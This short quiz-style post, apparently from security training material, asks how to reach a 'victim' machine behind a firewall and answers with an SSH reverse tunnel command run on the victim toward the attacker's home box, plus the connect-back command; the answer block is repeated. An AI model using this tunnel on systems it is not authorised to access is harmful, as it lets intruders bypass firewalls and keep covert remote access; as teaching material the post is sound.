Let's say you have physical access to a victim box on the target network running sshd on port 22. Additionally, you have a box at home also running sshd on port 22. You'd like to be able to go to your home box and connect to the victim machine's sshd server, but the victim is behind a firewall that stops inbound 22.
What command can you run from the victim machine to allow you to connect back to it from your home?
What is the command you run on your 'home' box to connect back to the victim?
scroll down for answer:
on victim: #ssh -p 22 user@homeip -R 3333:localhost:22
at home: #ssh -p 3333 localhost
scroll down for answer:
on victim: #ssh -p 22 user@homeip -R 3333:localhost:22
at home: #ssh -p 3333 localhost
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